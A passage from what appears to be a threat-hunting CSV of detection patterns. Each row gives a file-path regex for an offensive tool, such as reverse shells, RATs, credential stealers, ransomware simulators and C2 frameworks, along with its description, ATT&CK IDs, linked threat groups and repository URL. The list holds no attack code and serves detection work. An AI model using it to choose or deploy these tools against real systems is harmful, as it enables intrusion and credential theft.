Sinper.exe*",".{0,1000}\\Program\sRat\sV1\.0\sBy\sBlack\sSinper\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17540" "*\ProgramData\asrephashes.txt*",".{0,1000}\\ProgramData\\asrephashes\.txt.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","17547" "*\ProgramData\found_shares.txt*",".{0,1000}\\ProgramData\\found_shares\.txt.{0,1000}","offensive_tool_keyword","Dispossessor","credential scripts used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","17550" "*\ProgramData\shares.txt*",".{0,1000}\\ProgramData\\shares\.txt.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","17558" "*\Programs\StartUp\XenoUpdateManager*",".{0,1000}\\Programs\\StartUp\\XenoUpdateManager.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","17566" "*\prometheus.txt*",".{0,1000}\\prometheus\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","17568" "*\ProSpy_RAT_*.exe*",".{0,1000}\\ProSpy_RAT_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17569" "*\ProtectMyTooling.cna*",".{0,1000}\\ProtectMyTooling\.cna.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","17570" "*\ProtectMyTooling.py*",".{0,1000}\\ProtectMyTooling\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource 
Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","17571" "*\ProtectMyTooling.yaml*",".{0,1000}\\ProtectMyTooling\.yaml.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","17572" "*\ProtectMyToolingGUI.py*",".{0,1000}\\ProtectMyToolingGUI\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","17573" "*\ProtonRAT.exe*",".{0,1000}\\ProtonRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17574" "*\proxylistener.py*",".{0,1000}\\proxylistener\.py.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - 
BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","17584" "*\proxylogon.py*",".{0,1000}\\proxylogon\.py.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://github.com/hausec/ProxyLogon","1","0","N/A","N/A","10","3","293","76","2024-07-02T10:00:00Z","2021-03-15T14:37:57Z","17585" "*\proxyTunnel.ps1*",".{0,1000}\\proxyTunnel\.ps1.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","also known as PortStarter is a socks proxy and reverse socks server using powershell","T1090 - T1059.001 - T1102.003","TA0011 - TA0010 - TA0005 - TA0003","PortStarter","Vice Society - Conti","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","0","N/A","N/A","10","10","788","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z","17586" "*\ps_encoder.py*",".{0,1000}\\ps_encoder\.py.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","17587" "*\ps_proxy.ps1*",".{0,1000}\\ps_proxy\.ps1.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","17588" 
"*\ps_stager.ps1*",".{0,1000}\\ps_stager\.ps1.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","17589" "*\PS1ToBase64.ps1*",".{0,1000}\\PS1ToBase64\.ps1.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an 'all in one' Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some of). and that has all relevant tooling included. 
You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","17590" "*\Ps1ToVbs.ps1*",".{0,1000}\\Ps1ToVbs\.ps1.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","17591" "*\ps2exe.ps1*",".{0,1000}\\ps2exe\.ps1.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","N/A","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","17592" "*\PS2EXE.ps1*",".{0,1000}\\PS2EXE\.ps1.{0,1000}","offensive_tool_keyword","PS2EXE","Convert Powershell scripts to EXEs","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/PS2EXE","1","0","N/A","N/A","7","1","5","1","2024-08-31T12:34:50Z","2024-08-22T12:22:26Z","17593" "*\ps2exe.ps1*",".{0,1000}\\ps2exe\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","17595" "*\PS2EXE\*.ps1*",".{0,1000}\\PS2EXE\\.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode 
generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","17596" "*\PSAsyncShell.ps1*",".{0,1000}\\PSAsyncShell\.ps1.{0,1000}","offensive_tool_keyword","PSAsyncShell","PowerShell Asynchronous TCP Reverse Shell","T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/PSAsyncShell","1","0","N/A","N/A","10","10","155","22","2023-11-08T12:30:00Z","2022-07-19T15:38:34Z","17597" "*\PSAsyncShell.sh*",".{0,1000}\\PSAsyncShell\.sh.{0,1000}","offensive_tool_keyword","PSAsyncShell","PowerShell Asynchronous TCP Reverse Shell","T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/PSAsyncShell","1","0","N/A","N/A","10","10","155","22","2023-11-08T12:30:00Z","2022-07-19T15:38:34Z","17598" "*\PSAsyncShell-main*",".{0,1000}\\PSAsyncShell\-main.{0,1000}","offensive_tool_keyword","PSAsyncShell","PowerShell Asynchronous TCP Reverse Shell","T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/PSAsyncShell","1","0","N/A","N/A","10","10","155","22","2023-11-08T12:30:00Z","2022-07-19T15:38:34Z","17599" "*\PSAttack.sln*",".{0,1000}\\PSAttack\.sln.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","17600" "*\PSAttack.zip*",".{0,1000}\\PSAttack\.zip.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - 
T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","17601" "*\psexec.py*",".{0,1000}\\psexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","17603" "*\PsExecLog.log*",".{0,1000}\\PsExecLog\.log.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","Dispossessor","Discovery","https://github.com/GoFetchAD/GoFetch","1","0","N/A","N/A","10","7","633","99","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z","17604" "*\psexecsvc.py*",".{0,1000}\\psexecsvc\.py.{0,1000}","offensive_tool_keyword","susinternals","python implementation of PSExec native service implementation","T1569.002 - T1021.002 - T1035","TA0002 - TA0004 - TA0008 - TA0003","N/A","N/A","Lateral 
Movement","https://github.com/sensepost/susinternals","1","0","N/A","N/A","7","2","194","18","2025-02-11T09:34:50Z","2025-02-10T07:40:36Z","17605" "*\PSexecutionPolicy.bat*",".{0,1000}\\PSexecutionPolicy\.bat.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17606" "*\psgetsys.ps1*",".{0,1000}\\psgetsys\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","17607" "*\psgetsys.ps1*",".{0,1000}\\psgetsys\.ps1.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","0","N/A","N/A","10","5","406","88","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z","17608" "*\psgetsys.ps1*",".{0,1000}\\psgetsys\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 
- T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17609" "*\PSInject.ps1*",".{0,1000}\\PSInject\.ps1.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","17610" "*\PSLessExec.exe*",".{0,1000}\\PSLessExec\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","17611" "*\PSnmap.ps1*",".{0,1000}\\PSnmap\.ps1.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner (nmap like)","T1086 - T1046 - T1059","TA0007","N/A","Black Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","0","N/A","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","17614" "*\PSnmap.psd1*",".{0,1000}\\PSnmap\.psd1.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner (nmap like)","T1086 - T1046 - T1059","TA0007","N/A","Black 
Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","0","N/A","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","17615" "*\PSnmap.psm1*",".{0,1000}\\PSnmap\.psm1.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner (nmap like)","T1086 - T1046 - T1059","TA0007","N/A","Black Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","0","N/A","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","17616" "*\PSObfucate.py*",".{0,1000}\\PSObfucate\.py.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","17617" "*\pspasswd.exe*",".{0,1000}\\pspasswd\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","17618" "*\pspasswd64.exe*",".{0,1000}\\pspasswd64\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","17619" "*\PSprofile.exe*",".{0,1000}\\PSprofile\.exe.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","N/A","10","1","85","24","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z","17620" "*\PSPY.dll*",".{0,1000}\\PSPY\.dll.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","N/A","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","17621" "*\PSPY.exe*",".{0,1000}\\PSPY\.exe.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). 
The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","N/A","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","17622" "*\pspy\pspy.go*",".{0,1000}\\pspy\\pspy\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","17623" "*\PSRansom -*",".{0,1000}\\PSRansom\s\-.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","9","5","478","116","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z","17624" "*\PSRansom.ps1*",".{0,1000}\\PSRansom\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - 
T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","17625" "*\PSRecon\*",".{0,1000}\\PSRecon\\.{0,1000}","offensive_tool_keyword","PSRecon","PSRecon gathers data from a remote Windows host using PowerShell (v2 or later). organizes the data into folders. hashes all extracted data. hashes PowerShell and various system properties. and sends the data off to the security team. The data can be pushed to a share. sent over email. 
or retained locally.","T1059 - T1003 - T1556 - T1204","TA0002 - TA0009","N/A","N/A","Discovery","https://github.com/gfoss/PSRecon","1","0","N/A","N/A","9","5","486","105","2017-07-29T15:03:04Z","2015-08-03T05:43:38Z","17626" "*\PSReflect.psm1*",".{0,1000}\\PSReflect\.psm1.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","17627" "*\psscanner\psscanner.go*",".{0,1000}\\psscanner\\psscanner\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","17628" "*\pth-toolkit-master\*",".{0,1000}\\pth\-toolkit\-master\\.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","N/A","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","17631" "*\Public\chop.enc*",".{0,1000}\\Public\\chop\.enc.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral 
